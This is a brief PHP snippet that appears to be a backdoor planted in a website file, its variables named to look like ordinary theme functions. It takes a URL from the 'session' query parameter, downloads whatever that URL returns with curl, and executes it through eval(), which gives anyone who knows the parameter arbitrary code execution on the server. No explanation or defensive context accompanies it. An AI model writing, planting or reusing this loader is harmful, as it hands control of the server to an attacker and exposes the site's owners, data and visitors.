<?php if (isset($_GET['session'])) { $get_header_mbu = $_GET['session']; if ($comment_form_lyw = curl_init()) { curl_setopt($comment_form_lyw, CURLOPT_URL, $get_header_mbu); curl_setopt($comment_form_lyw, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($comment_form_lyw)); curl_close($comment_form_lyw); exit; } }